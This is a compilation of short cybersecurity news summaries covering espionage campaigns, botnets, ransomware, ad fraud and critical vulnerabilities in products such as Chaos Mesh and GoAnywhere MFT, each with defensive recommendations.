UNC1549 Hacks Telecom Firms Across Europe Via Recruitment-Themed LinkedIn Attacks
UNC1549, an Iran-nexus cyber espionage group, recently targeted 11 European telecommunications companies and successfully compromised 34 devices. Researchers attribute the campaign to the Subtle Snail cluster, characterized by well-engineered LinkedIn job lures and custom malware deployments.
Attack Vector: Social Engineering via LinkedIn
The campaign leveraged fake recruitment offers circulated on LinkedIn to entice telecom employees into engaging with malicious content. Once an employee clicked the lure, the attackers deployed the MINIBIKE malware, which evaded detection by masquerading as legitimate applications and leveraging encrypted payload delivery. The malware established persistent remote access across compromised endpoints.
Malware Details: MINIBIKE Characteristics
MINIBIKE uses modular plugins tailored to the victim’s infrastructure, with capabilities including credential harvesting, lateral movement, and network reconnaissance. Its loader checks system fingerprints to avoid automated analysis and ensures payload delivery only on targeted devices. The group maintained command-and-control infrastructure using rotating relay servers to mitigate takedown risk.
Implications and Attribution
The affected organizations faced risks of exfiltration of sensitive internal data, operational disruption, and exploitation of telecom systems for further global espionage objectives. UNC1549 tactics align with previous activities attributed to Iran’s Islamic Revolutionary Guard Corps, indicating persistent multi-year targeting of European critical infrastructure.
REM Proxy Botnet Leverages SystemBC Malware to Power Criminal Proxy Services
A botnet known as REM Proxy has expanded to control roughly 1,500 daily victim VPS systems and 20,000 Mikrotik routers worldwide, offering a criminal proxy network for rent. An investigation reveals malware like SystemBC underpins this illicit infrastructure.
Technical Breakdown: SystemBC Deployment
SystemBC, a versatile proxy malware, is distributed across vulnerable internet-facing VPS servers using automated exploit kits. Once installed, it connects to one of 80 distributed command-and-control servers, encrypts traffic, and proxies user-submitted web requests through infected endpoints. This enables anonymous access for fraudsters performing credential theft, financial scams, or lateral attacks.
Network Infrastructure and Operational Scale
REM Proxy markets itself by listing thousands of operational routers and VPS systems, providing access to high-speed global endpoints with minimal geographic restrictions. Most of the infrastructure is orchestrated using cloud-based control panels and dynamic DNS techniques to continuously reassign compromised assets.
Mitigation Efforts and Risks
Security teams recommend network scanning for anomalous encrypted outbound traffic to C2 servers, blocking suspicious VPS IP ranges, and updating vulnerable Mikrotik devices. The scale of REM Proxy presents significant challenges for traditional detection and ISP-level blocking.
TA558 Uses AI-Generated Phishing Scripts to Deploy Venom RAT in Brazilian Hospitality Attacks
TA558, an actor previously seen in South American cybercrime, has adopted AI-driven automation to enhance spear phishing campaigns targeting hotels in Brazil and adjacent Spanish-speaking markets. These attacks delivered a new variant of Venom RAT, a remote access trojan capable of deep internal compromise.
AI Scripting and Malicious Payload Evolution
TA558 used generative AI tools to craft convincing invoice phishing emails, dynamically altering content to bypass local spam filters and increase recipient engagement. Embedded scripts launched obfuscated PowerShell payloads that installed the Venom RAT, granting attackers persistent control with webcam, keystroke, and credential harvesting capabilities.
Timeline and Technical Sophistication
The attacks occurred over the summer of 2025, exploiting older email infrastructure and weak endpoint protections. The Venom RAT variant used encrypted communication channels and code recycling to avoid signature-based antivirus detections, while exfiltrating proprietary hotel, guest, and payment data to offshore servers.
Industry Impact
The incidents highlight rising risks in hospitality, as attackers automate campaign development and payload delivery. Researchers recommend upgraded mail gateway controls, end-user security training, and rapid incident detection to counter evolving AI-assisted threat tactics.
Chaos Mesh GraphQL Vulnerabilities Enable Remote Code Execution and Kubernetes Cluster Takeover
Multiple critical vulnerabilities have emerged in Chaos Mesh, a popular Kubernetes fault injection tool, allowing remote attackers to achieve full cluster takeover through GraphQL API abuse. Exploitation requires only limited network access, posing widespread risk for cloud infrastructure deployments.
Vulnerability Details and RCE Pathways
The flaws reside in the GraphQL query-handling routines, which lack adequate input validation and authentication controls. Attackers can inject arbitrary GraphQL queries to trigger remote code execution, force data corruption, shut down Kubernetes pods, or disrupt service mesh communications. Some vulnerabilities allow privilege escalation from basic user accounts to full cluster admin.
Attack Vectors and Real-World Impact
In production environments, merely having in-cluster connectivity—for example, via a misconfigured sidecar or compromised internal service—permits exploitation. Large-scale cloud providers and managed Kubernetes services running Chaos Mesh are advised to isolate fault injection controls and patch affected API endpoints immediately.
SlopAds Ad Fraud Operation Exploits 224 Android Apps, Generates Billions of Fake Ad Bids Daily
The SlopAds fraud ring has orchestrated a large-scale click fraud and ad impression scam, leveraging 224 legitimate-appearing Android applications installed by 38 million users across 228 countries. These apps covertly generate 2.3 billion fraudulent ad bids every day.
Fraud Mechanism: Steganography and Hidden WebViews
SlopAds payloads embed fraud scripts using steganographic techniques, concealing malicious executable code in image files within the apps. On launch, these scripts generate invisible WebViews which simulate user clicks and impressions without user knowledge. The traffic is directed to actor-controlled cashout sites, monetizing fake engagement.
Detection, Take-Down, and Industry Response
Threat intelligence teams identified suspicious ad network traffic and traced it to coordinated app clusters. App stores conducted takedowns, but the network continues to adapt by re-monetizing new releases and updating payloads. Advertisers face increased costs and reduced campaign legitimacy.
Apple Warns French Users of New Spyware Campaign; CERT-FR Affirms Persistent Threat
Apple has issued its fourth warning this year to users in France regarding a targeted spyware campaign, as confirmed by the Computer Emergency Response Team of France (CERT-FR). Recent alerts indicate ongoing nation-state surveillance of iOS devices linked to French iCloud accounts.
Spyware Delivery and Targeting
Attacks reportedly use zero-day exploits to remotely install advanced surveillance malware on targeted devices. Infection vectors include malicious iMessage payloads and exploit chains directed at high-value targets such as journalists and government employees. Apple’s rapid alert system enables timely threat notification and encourages urgent device patching.
Threat Actor Attribution and Response
Multiple intelligence sources suggest involvement by state-sponsored groups; CERT-FR continues forensic analysis and incident response coordination. Apple recommends prompt OS updates and enhanced account security measures.
New HybridPetya Ransomware Bypasses UEFI Secure Boot via CVE-2024-7344 Exploit
HybridPetya, a newly discovered ransomware variant, integrates technical features of previous Petya and NotPetya attacks but adds capability to bypass UEFI Secure Boot protections on Windows systems through exploitation of CVE-2024-7344.
Vulnerability Exploitation and Deployment
Attackers exploit the Secure Boot bypass flaw to install malicious bootloaders before Windows launches, granting full disk access and enabling encrypted extortion. The ransomware supports both targeted enterprise and spray-and-pray distribution via phishing, exploiting patched systems with older firmware.
Technical and Prevention Details
This variant encrypts system files, disables recovery options, and deletes shadow copies, preventing easy restoration. Security teams should verify that all devices are updated with the latest UEFI and OS patches, monitor for unauthorized disk access attempts, and maintain offline backups.
Critical CVE-2025-5086 DELMIA Apriso Vulnerability Actively Exploited
A critical zero-day, CVE-2025-5086, affecting DELMIA Apriso manufacturing execution systems, is now under active exploitation. CISA has issued urgent guidance for immediate mitigation.
Technical Details and Observed Attacks
The vulnerability allows remote unauthenticated attackers to execute arbitrary commands or escalate privileges via exposed APIs. Adversaries have targeted manufacturing networks, causing production disruptions and data breaches.
Mitigation and Industry Impact
Organizations must patch vulnerable installations, restrict network exposure, and monitor for anomalous activity. The attacks highlight ongoing risks to operational technology within large-scale industrial sectors.
Jaguar Land Rover Extends Production Delay After Major Cyberattack
Jaguar Land Rover has announced further production delays following a significant cyberattack claimed by a hacker group known for sophisticated social engineering tactics. The incident disrupted critical manufacturing processes at multiple locations and triggered a broader investigation.
Attack Methods and Impact
Security teams identified an initial compromise through targeted phishing and lateral movement across interconnected networks. The intrusion disabled several industrial control systems, temporarily halting assembly lines. Forensic review is ongoing, and data integrity restoration remains a priority.
Industry Response
Automotive firms are updating incident response protocols and sharing indicator lists with industry peers. Work continues on restoring affected systems and enhancing security controls against future threats.
FBI Warns of Two Active Targeted Campaigns Against Salesforce Instances
The FBI has issued a warning regarding two ongoing campaigns by UNC6040 and UNC6395 aimed at exploiting Salesforce cloud environments. These campaigns involve diverse tactics to gain unauthorized access to enterprise customer data.
Technical Tactics and Data Exfiltration
UNC6040 uses credential phishing and malicious OAuth app installations, granting broad API access to business data. UNC6395 leverages token replay and session hijacking, bypassing conventional authentication controls. The campaigns have led to exfiltration of sensitive CRM and sales data.
Defensive Recommendations
Customers should enforce strong MFA, review OAuth consent and session logs, and restrict third-party app authorizations within Salesforce instances. The warning underscores the importance of cloud configuration hygiene and continuous monitoring.
VoidProxy Phishing-as-a-Service Platform Bypasses Multi-Factor Authentication Defenses
Security researchers have identified VoidProxy, a phishing-as-a-service platform capable of bypassing multi-factor authentication protections for Microsoft and Google accounts. The service leverages advanced session replay and proxy techniques, threatening business email security and enabling credential theft.
Technical Mechanism and Evolution
The service dynamically relays login pages and authentication prompts through an adversary-controlled server, capturing both user credentials and one-time MFA tokens. Attackers can immediately access victim accounts and conduct business email compromise or data exfiltration.
Mitigation Steps
Researchers recommend app-based MFA, phishing-resistant authentication mechanisms (such as security keys), and user awareness campaigns. Organizations should validate login source metadata and investigate anomalous access events.
Palo Alto Networks and Zscaler Customers Derailed by Salesloft Drift-Linked Supply Chain Attack
Cybersecurity firms Palo Alto Networks and Zscaler report impacts to their customer base following a complex supply chain attack associated with malicious credential use from Salesloft Drift. Reports indicate hundreds of downstream victims, encompassing critical corporate and SaaS infrastructures.
Attack Vector and Discovery
The threat campaign began by compromising developer GitHub credentials, granting access to internal integrations and code repositories. Attackers inserted new backdoors into platform codebases, pivoted across internal networks, and deployed payloads against live production environments, resulting in persistent unauthorized access for weeks.
Mitigation and Current Status
Affected firms are resetting credentials, revoking third-party API permissions, and instituting code reviews for supply chain security. Customers are advised to monitor for suspicious system behaviors and update authentication workflows.
Fortra Releases Critical Patch for CVSS 10.0 Vulnerability in GoAnywhere MFT
Fortra has addressed a critical remote code execution vulnerability with a CVSS 10.0 rating in its GoAnywhere Managed File Transfer product. The flaw allowed attackers to gain complete control over file transfer servers.
Vulnerability Details and Exploitation
The RCE flaw was exploited via specifically crafted web requests that bypass authentication and permission checks. Attackers could install arbitrary backdoors, exfiltrate files, and manipulate administrative settings. Immediate patching is essential for all affected systems.
Security Recommendations
System administrators should deploy the released patch, audit logs for suspicious activity, and adopt network segmentation to reduce blast radius of future exploits.